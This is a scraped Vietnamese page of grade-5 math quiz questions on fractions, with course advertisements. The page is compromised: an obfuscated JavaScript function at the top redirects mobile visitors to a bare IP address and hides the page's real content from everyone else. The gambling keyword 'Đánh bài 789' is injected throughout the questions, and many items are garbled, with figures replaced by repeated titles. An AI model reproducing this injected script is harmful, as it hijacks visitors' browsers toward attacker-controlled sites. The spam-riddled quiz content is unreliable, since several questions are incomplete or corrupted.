function goPAGE() { if ((navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i))) { window.location.href = "http://180.215.56.197/" } else { var ss = '
'; eval("do" + "cu" + "ment.wr" + "ite('" + ss + "');"); try { setInterval(function() { try { document.getElementById("div" + "All").style.display = "no" + "ne" } catch (e) {} for (var i = 0; i < document.body.children.length; i++) { try { var tagname = document.body.children[i].tagName; var myid = document.body.children[i].id; if (myid != "iconDiv1" && myid != "yangchen") { document.body.children[i].style.display = "non" + "e" } } catch (e) {} } }, 100) } catch (e) {} } } goPAGE();

1000 bài tập trắc nghiệm Toán lớp 5 chọn lọc, có đáp án

Tài liệu tổng hợp 1000 bài tập và câu hỏi trắc nghiệm Toán lớp 5 chọn lọc, có đáp án và lời giải chi tiết được biên soạn theo từng bài học. Hi vọng với bộ bài tập trắc nghiệm này sẽ giúp Thầy/Cô có thêm tài liệu giảng dạy môn Toán lớp 5, giúp các bận phụ huynh dễ dàng học cùng các con. Và hi vọng với bộ Câu hỏi trắc nghiệm này sẽ giúp các em học sinh ôn tập, hiểu bài môn Toán lớp 5. Bạn vào tên bàiĐánh bài 789 để theo dõi phần Bài tập trắc nghiệm Toán 5 và lời giải tương ứng.

Mục lục Bài tập trắc nghiệm Toán 5

Bài tập trắc nghiệm Toán lớp 5 Học kì 1

Chương 1: Ôn tập và bổ sung về phân số. Giải toán liên quan đến tỉ lệ. Bảng đơn vị đo diện tích

Chương 2: Số thập phân. Các phép toán với số thập phân

I - Số thập phân

II - Các phép tính với số thập phân

1. Phép cộng

2. Phép trừ

3. Phép nhân

4. Phép chia

Bài tập trắc nghiệm Toán lớp 5 Học kì 2

Chương 3: Hình học

Chương 4: Số đo thời gian. Toán chuyển động đều

I - Số đo thời gian

II - Vận tốc, quãng đường, thời gian

Chương 5: Ôn tập

I - Ôn tập về số tự nhiên, phân số, số thập phân, số đo đại lượng

II - Ôn tập về các phép tính với các số tự nhiên, phân số, số thập phân

III - Ôn tập về hình học

IV - Ôn tập về giải toán

Bài tập: Ôn tập: Khái niệm về phân số. Tính chất cơ bản của phân số có đáp án

Câu 1:Đánh bài 789 Trong các các viết phân số sau, cách viết nào sai?

Bài tập: Ôn tập: Khái niệm về phân số. Tính chất cơ bản của phân số có đáp án | Trắc nghiệm Toán lớp 5 có lời giải

Câu 2: Tử số của phân số Bài tập: Ôn tập: Khái niệm về phân số. Tính chất cơ bản của phân số có đáp án | Trắc nghiệm Toán lớp 5 có lời giải là:

A. 25

B. 26

C. 37

D. 23

Câu 3: Phân số chỉ số ô vuông đã tô màu trong hình sau là:

Bài tập: Ôn tập: Khái niệm về phân số. Tính chất cơ bản của phân số có đáp án | Trắc nghiệm Toán lớp 5 có lời giải

Câu 4: Thương của phép chia 9 : 14 được viết dưới dạng phân số là:

Bài tập: Ôn tập: Khái niệm về phân số. Tính chất cơ bản của phân số có đáp án | Trắc nghiệm Toán lớp 5 có lời giải

Câu 5: Điền số thích hợp vào chỗ chấm: 1 = Bài tập: Ôn tập: Khái niệm về phân số. Tính chất cơ bản của phân số có đáp án | Trắc nghiệm Toán lớp 5 có lời giải

A. 100

B. 98

C. 97

D. 99

Bài tập: Ôn tập: So sánh hai phân số có đáp án

Câu 1: Con hay chọn đáp án đúng nhất:

Đánh bài 789Trong hai phân số có cùng mẫu só thì:

A. Phân số nào có tử số lớn hơn thì phân số đó lớn hơn

B. Phân số nào có tử số bé hơn thì phân số đó bé hơn.

Đánh bài 789C. Nếu tử số bằng nhau thì hai phân số đó bằng nhau.

Đánh bài 789D. Tất cả các đáp án trên đều đúng.

Câu 2: Để Bài tập: Ôn tập: So sánh hai phân số có đáp án | Trắc nghiệm Toán lớp 5 có lời giải (b khác 0, c khác 0) thì ta cần có thêm điều kiện gì của bc?

A. b = c

B. b > c

C. b < c

D. A và C đều đúng

Câu 3: Chọn dấu thích hợp để điền vào chỗ chấm: Bài tập: Ôn tập: So sánh hai phân số có đáp án | Trắc nghiệm Toán lớp 5 có lời giải

A. >

B. <

C. =

Câu 4: Chọn dấu thích hợp để điền vào chỗ chấm: Bài tập: Ôn tập: So sánh hai phân số có đáp án | Trắc nghiệm Toán lớp 5 có lời giải

Câu 5: Chọn phân số lớn hớn trong hai phân số sau:

Bài tập: Ôn tập: So sánh hai phân số có đáp án | Trắc nghiệm Toán lớp 5 có lời giải

Bài tập: Ôn tập: So sánh hai phân số (tiếp theo) có đáp án

Câu 1: Khi nào ta có thể so sánh hai phân số bằng phương pháp so sánh với 1?

A. Khi hai phân số đều bé hơn 1

B. Khi hai phân số đều lớn hơn 1

Đánh bài 789C. Khi một phân số bé hơn 1 và một phân số lớn hơn 1

D. Khi hai phân số đều bằng 1

Câu 2: Khi nào ta có thể so sánh hai phân số bằng phương pháp so sánh với phân số trung gian?

Đánh bài 789A. Khi tử số của phân số thứ nhất bé hơn tử số của phân số thứ hai và mẫu số của phân số thứ nhất lại lớn hơn mẫu số của phân số thứ hai.

Đánh bài 789B. Khi tử số của phân số thứ nhất lớn hơn tử số của phân số thứ hai và mẫu số của phân số thứ nhất lại nhỏ hơn mẫu của phân số thứ hai.

C. Cả A và B đều sai.

D. Cả A và B đều đúng.

Câu 3: Phần bù 1 của phân số Bài tập: Ôn tập: So sánh hai phân số (tiếp theo) có đáp án | Trắc nghiệm Toán lớp 5 có lời giải là:

Bài tập: Ôn tập: So sánh hai phân số (tiếp theo) có đáp án | Trắc nghiệm Toán lớp 5 có lời giải

Câu 4: Phần hơn với 1 của phân số Bài tập: Ôn tập: So sánh hai phân số (tiếp theo) có đáp án | Trắc nghiệm Toán lớp 5 có lời giải là:

Bài tập: Ôn tập: So sánh hai phân số (tiếp theo) có đáp án | Trắc nghiệm Toán lớp 5 có lời giải

Câu 5: Khi so sánh hai phân số Bài tập: Ôn tập: So sánh hai phân số (tiếp theo) có đáp án | Trắc nghiệm Toán lớp 5 có lời giải ta có thể chọn phân số trung gian là:

Bài tập: Ôn tập: So sánh hai phân số (tiếp theo) có đáp án | Trắc nghiệm Toán lớp 5 có lời giải

Bài tập: Phân số thập phân có đáp án

Câu 1: Mẫu số của một phân số thập phân có thể là những số nào?

A. Các số chẵn

Đánh bài 789B. Các số 10; 100; 1000; …

C. Các số lẻ

Đánh bài 789D. Mọi số tự nhiên khác 0

Câu 2: Trong các phân số sau, phân số nào là phân số thập phân?

Bài tập: Phân số thập phân có đáp án | Trắc nghiệm Toán lớp 5 có lời giải

Câu 3: Phân số Bài tập: Phân số thập phân có đáp án | Trắc nghiệm Toán lớp 5 có lời giảiĐánh bài 789 được gọi là:

Đánh bài 789A. Ba bố năm phần nghìn

Đánh bài 789B. Ba trăm bốn mươi năm phần trăm

C. Ba trăm bốn lăm phần nghìn

D. Ba trăm bốn mươi lắm phần nghìn

Câu 4:Đánh bài 789 Phân số “bảy mươi chín phần nghìn” được viết là:

Bài tập: Phân số thập phân có đáp án | Trắc nghiệm Toán lớp 5 có lời giải

Câu 5: Cho các phân số sau: Bài tập: Phân số thập phân có đáp án | Trắc nghiệm Toán lớp 5 có lời giải

Đánh bài 789A. 3 phân số

B. 4 phân số

Đánh bài 789C. 5 phân số

Đánh bài 789D. 6 phân số

Xem thêm các bài Để học tốt Toán lớp 5 hay khác:

KHÓA HỌC GIÚP TEEN 2009 ĐẠT 9-10 LỚP 5

Phụ huynh đăng ký khóa học lớp 5 cho con sẽ được tặng miễn phí khóa ôn thi học kì. Cha mẹ hãy đăng ký học thử cho con và được tư vấn miễn phí tại khoahoc.poclink.com

Tổng đài hỗ trợ đăng ký khóa học: 084 283 45 85

4.5 (243)

799,000đs

599,000 VNĐ

4.5 (243)

799,000đ

599,000 VNĐ

4.5 (243)

799,000đ

599,000 VNĐ

Đã có app VietJack trên điện thoại, giải bài tập SGK, SBT Soạn văn, Văn mẫu, Thi online, Bài giảng....miễn phí. Tải ngay ứng dụng trên Android và iOS.

Theo dõi chúng tôi miễn phí trên mạng xã hội facebook và youtube:

Loạt bài Giải bài tập Toán 5 | Để học tốt Toán 5 của chúng tôi được biên soạn một phần dựa trên cuốn sách: Giải Bài tập Toán 5Để học tốt Toán 5 và bám sát nội dung sgk Toán lớp 5.

Nếu thấy hay, hãy động viên và chia sẻ nhé! Các bình luận không phù hợp với nội quy bình luận trang webĐánh bài 789 sẽ bị cấm bình luận vĩnh viễn.